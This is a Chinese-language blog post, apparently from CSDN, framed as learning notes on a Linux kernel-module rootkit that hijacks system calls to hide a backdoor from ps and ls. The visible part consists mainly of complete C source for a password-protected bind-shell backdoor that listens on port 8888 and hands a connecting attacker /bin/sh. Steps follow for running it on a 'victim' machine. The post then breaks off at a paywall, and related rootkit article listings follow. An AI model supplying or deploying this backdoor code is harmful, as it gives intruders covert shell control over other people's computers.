Rootkit-LKM编程劫持系统调用,隐藏后门程序backdoor(ps,ls)

最新推荐文章于 2022-03-27 17:40:17 发布
最新推荐文章于 2022-03-27 17:40:17 发布
阅读量4.2k 收藏 7
点赞数 6
分类专栏: linux内核 信息安全 网络工具 文章标签: linux kernel rootkit backdoor 系统调用劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bw_yyziq/article/details/78448667
版权

前言

最近学习到rootkit,由于之前没怎么接触到Linux内核,系统调用具体实现这些稍底层的东西,并且参考的许多代码都是基于内核2.6的又不想重装低版本系统,所以踩了很多坑浪费了很多时间,查了许多资料,掉了许多头发,现稍整理希望能给后面采坑的人提供一点思路。

环境:
Ubuntu 16.04
linux内核版本 4.10.0-37

代码在这里
积分多的可以下载一下,没积分的后面也有完整代码

注:这里的makefile要注意一下
这里写图片描述

打开是这样的,划红线的地方留下你要编译的,另一个注掉
这里写图片描述

backdoor

backdoor,说是后门程序,个人感觉后门程序的范围很大,偷偷装在别人电脑里面试图达到某些社(不)会(可)和(告)谐(人)目的的都是后门程序,只是功能不一样,地点不一样,有的在用户态有的在内核之类的,比如Rootkit,装在内核里面,隐藏文件、进程和网络链接之类的信息。

下面用socket写一个简单的backdoor,功能是打开受害者电脑特定端口,接收到攻击者的连接请求成功后打开一个bash,从而攻击者可以操纵受害者电脑做任何不可描述的事情。

思路是这样的:

打开端口进行监听–>接收到连接请求后发现是攻击者–>打开一个bash并将标准输入输出绑定到socket

代码是这样的:

#include  <stdio.h> 
#include  <sys/socket.h> 
#include  <unistd.h> 
#include  <sys/types.h> 
#include  <netinet/in.h> 
#include  <stdlib.h>
#include <string.h>


int main(int argc, char **argv)
{
    int i, listenfd, goshyoujinnsama;
    pid_t pid;
    int len = 128;
    int port=8888;  
    char buf[len];
    socklen_t len2;
    struct sockaddr_in s_addr;
    struct sockaddr_in c_addr;
    char enterpass[32]="Stop! who are you ?";
    char welcome[32]="Welcome,master!";
    char password[5]="11111";
    char sorry[32]="heheda !";

    listenfd = socket(AF_INET,SOCK_STREAM,0);
    if (listenfd == -1){
        exit(1);
    }

    bzero(&s_addr,sizeof(s_addr));
    s_addr.sin_family=AF_INET;
    s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
    s_addr.sin_port=htons(port);

    if (bind(listenfd, (struct sockaddr *)&s_addr, sizeof(s_addr)) == -1){
        exit(1);
    }
    if (listen(listenfd, 20)==-1){
        exit(1);
    }
    len2 = sizeof(c_addr);

    while(1){
        goshyoujinnsama = accept(listenfd, (struct sockaddr *)&c_addr, &len2);
        if((pid = fork()) > 0)
        {
            exit(0);
        }else if(!pid){
            close(listenfd);
            write(goshyoujinnsama, enterpass, strlen(enterpass));
            memset(buf,'\0', len);
            read(goshyoujinnsama, buf, len);
            if (strncmp(buf,password,5) !=0){
                write(goshyoujinnsama, sorry, strlen(sorry));
                close(goshyoujinnsama);
                exit(0);
            }else{
                write(goshyoujinnsama, welcome, strlen(welcome));
                dup2(goshyoujinnsama,0);
                dup2(goshyoujinnsama,1); 
                dup2(goshyoujinnsama,2);
                execl("/bin/sh", "toSyojinn", (char *) 0);
            }
        }
    }
    close(goshyoujinnsama);
}

过程是这样的:

1.受害者电脑上编译backdoor
这里写图片描述

2.编译好了跑一下
这里写图片描述

3.攻击者电脑上发送连接请求
这里写图片描述

4.连接成功,ls试一下能不能看到受害者电脑上目录

最低0.47元/天 解锁文章
bw_yyziq
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
系统调用捕获和分析—使用LKM方法添加系统调用
H4ppyD0g的博客
06-13 347
本文为毕业设计过程中学习相关知识、动手实践记录下来的完整笔记,通过阅读本系列文章,您可以从零基础了解系统调用的底层原理并对系统调用进行拦截。由于本人能力有限,文章中可能会出现部分错误信息,如有错误欢迎指正。另外,本系列所有内容仅作为个人学习研究的笔记,转载请标明出处。感谢您的关注!这也是作者极力推荐的一个系列文章!完整系列文章列表 系统调用捕获和分析—通过ptrace获取系统调用信息 系统调用捕获和分析—通过strace获取系统调用信息 系统调用捕获和分析—必备的系统安全的知识点LKM(Load Kerne
防止恶意LKM修改Linux系统调用的方法研究.pdf
09-06
防止恶意LKM修改Linux系统调用的方法研究.pdf
(渗透测试后期)Linux进程隐藏详解
热门推荐
qq_42882717的博客
03-27 1万+
文章目录(渗透测试后期)Linux进程隐藏详解前言Linux进程基础Linux进程侦查手段Linux进程隐藏手段一、基于用户态的进程隐藏方法1:小隐隐于/proc/pid——劫持readdir系统调用额外:加载至arm方法2:小隐隐于/proc/pid——mount 挂载二、基于内核态的进程隐藏方法3:大隐隐于内核——修改内核源码+系统调用方法4:大隐隐于内核——修改内核源码proc_pid_lookup方法5:大隐隐于内核——编写驱动/内核模块——LKM实现进程隐藏总结 (渗透测试后期)Linux进程隐藏
后门技术和Linux LKM Rootkit详解
zhxlinux的专栏
03-04 857
在这篇文章里, 我们将看到各种不同的后门技术,特别是 Linux的可装载内核模块(LKM)。 我们将会发现LKM后门比传统的后门程序更加复杂,更加强大,更不易于被发现。知道这些之后,我们可以制造我们 自己的基于LKM的Rootkit程序, 主要体现在TCP/IP层, 因为我们相信这是在系统管理员面前最好的隐藏后门的地方。序言在一些黑客组织中, Rootkit (或者backdoor) 是一
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 1918
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
Hijack linux system calls rootkit:劫持 linux 系统调用-开源
07-17
劫持linux系统调用,例如调用open系统调用时,会调用新的被劫持系统调用,而不是原来的系统调用。 请参阅:http://se7so.blogspot.com/2012/07/hijacking-linux-system-calls-rootkit.html
rootkit-base:Rootkit系统的基本合同和将来的分叉
03-31
在IT领域,Rootkit是一种特殊的恶意软件,它隐藏在操作系统中,使得攻击者可以秘密地控制和监视系统。Rootkit通常包含一系列工具,用于隐藏进程、文件、网络连接和其他系统活动,使攻击者能够持久地存在于受感染的...
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit。假如是内核级的木马,那么该方法就无效了)。 因为修改系统内核相对复杂...
lkm-rootkit:lkm Rootkit 支持 x8664、arm、mips
07-04
lkm-rootkitan lkm rootkit support x86/64,arm,mips支持 kernel version 2.6 及 3.x ,支持 x86, x86_64, arm, mips 平台,支持进程隐藏、进程免杀(root 无法 kill)支持文件隐藏、文件免杀(root 无法修改、删除)...
后门技术和Linux LKM Rootkit详细解析
03-04
知道这些之后,我们可以制造我们自己的基于LKM的Rootkit程序,主要体现在TCP/IP层, 因为我们相信这是在系统管理员面前最好的隐藏后门的地方。介绍一下已经存在的后门技术, 然后和LKM技术相比较, 最后讨论我么的LKM...
backdoor后门
04-02
backdoor后门backdoor后门
一份rootkit 编译好的 学习用
07-17
一份rookit 大家学习用,都是私人的东西。里面带了驱动安装的工具!!!供大家调试用
rootkit,文件,进程隐藏
11-05
rootkit,backdoor系统调用劫持ps进程隐藏ls文件隐藏,代码
Linux Rootkit之三:系统调用劫持简介
Remy的学习记录
07-24 2447
系统调用
Rootkit技术的主要原理
葉落堂
08-01 810
文章作者:hackisle信息来源:邪恶八进制信息安全团队(www.eviloctal.com)rootkit的主要分类:应用级->内核级->硬件级早期的rootkit主要为应用级rootkit,应用级rootkit主要通过替换login、psls、netstat等系统工具,或修改.rhosts等系统配置文件等实现隐藏后门;硬件级rootkit主要指bios rootkit,可以在系统加载前获
科软-信息安全实验3-Rootkit劫持系统调用
weixin_30797027的博客
06-13 2210
目录 一 前言 二 Talk is cheap, show me the code 三 前期准备 四 效果演示 五 遇到的问题&解决 六 18.04的坑 七 参考资料 八 老师可能的提问 一 前言 文章不讲解理论知识哈,想学习理论知识的,认真听课
linux lkm rootkit常用技巧
weixin_30625691的博客
06-12 288
简介 搜集一下linux lkm rootkit中常用的一些技巧 1、劫持系统调用 遍历地址空间 根据系统调用中的一些导出函数,比如sys_close的地址来寻找 unsigned long ** get_sys_call_table(void) { unsigned long **entry = (unsigned long **)PAGE_OFFSET; ...
Linux下rootkit后门
weixin_34067102的博客
11-09 476
下载地址:点击下载tarzxvf mafix_rootkit.tar.gz 解压。进入目录并用root权限运行。安装rootkit 命令:./root 密码 端口 (如: ./root xiaoma 99 那么下次连接的时候只需用putty连接它的99端口,用户名是root,密码为xiaoma)安装完成后会自动删除目录,为了隐蔽,用 history -c 清除下...
rootkit后门程序具有哪些特点? 隐藏进程 隐藏文件 隐藏端口
最新发布
06-12
Rootkit后门程序具有以下特点: 1. 隐藏进程:Rootkit后门程序可以隐藏自己的进程和线程,从而避免被系统管理员或杀毒软件发现。 2. 隐藏文件:Rootkit后门程序可以隐藏自己的文件和目录,从而避免被系统管理员或杀毒软件发现。 3. 隐藏端口:Rootkit后门程序可以监听一个或多个网络端口,并隐藏自己的端口连接信息,从而避免被系统管理员或网络安全工具发现。 4. 自动启动:Rootkit后门程序可以在系统启动时自动启动,从而始终在后台运行。 5. 修改系统API:Rootkit后门程序可以修改系统的API,从而欺骗系统管理员或安全工具,隐藏自己的存在。 6. 伪装成合法程序:Rootkit后门程序可以伪装成合法的进程或服务,从而避免被系统管理员或杀毒软件发现。 因此,Rootkit后门程序具有很强的隐蔽性和欺骗性,可以长期潜伏在系统中,对系统进行监控、窃取信息或进行攻击。对于系统管理员和安全工程师来说,及时发现和清除Rootkit后门程序具有重要的意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值